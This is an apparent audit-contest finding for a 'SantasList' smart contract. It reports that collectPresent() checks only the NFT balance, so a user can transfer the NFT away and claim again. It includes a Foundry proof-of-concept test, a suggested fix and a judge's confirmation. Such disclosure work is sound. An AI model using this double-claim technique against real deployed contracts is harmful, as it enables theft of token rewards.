Submission Details
Severity:
Malicious user can collect present many times if he transfers his NFT to other address
Summary
Malicious user can collect present many times if he transfers his NFT to other address
Vulnerability Details
If a user can collect present, he collected present. Then he transfer his NFT to other address, then he can bypass balanceOf(msg.sender) > 0. He can collect present again.
Impact
Malicious user can collect present many times.
Tools Used
foundry
POC
function testCollectPresentTwice() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
assertEq(santasList.balanceOf(user), 1);
assertEq(santaToken.balanceOf(user), 1e18);
santasList.transferFrom(user, user2, 0);
assertEq(santasList.balanceOf(user2), 1);
santasList.collectPresent();
assertEq(santasList.balanceOf(user), 1);
assertEq(santaToken.balanceOf(user), 2e18);
vm.stopPrank();
}
Recommendations
add an mapping to record someone has already collected present
Updates
Lead Judging Commences
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
Weak Already Collected Check
Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
Rewards breakdown
nSLOC
116This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.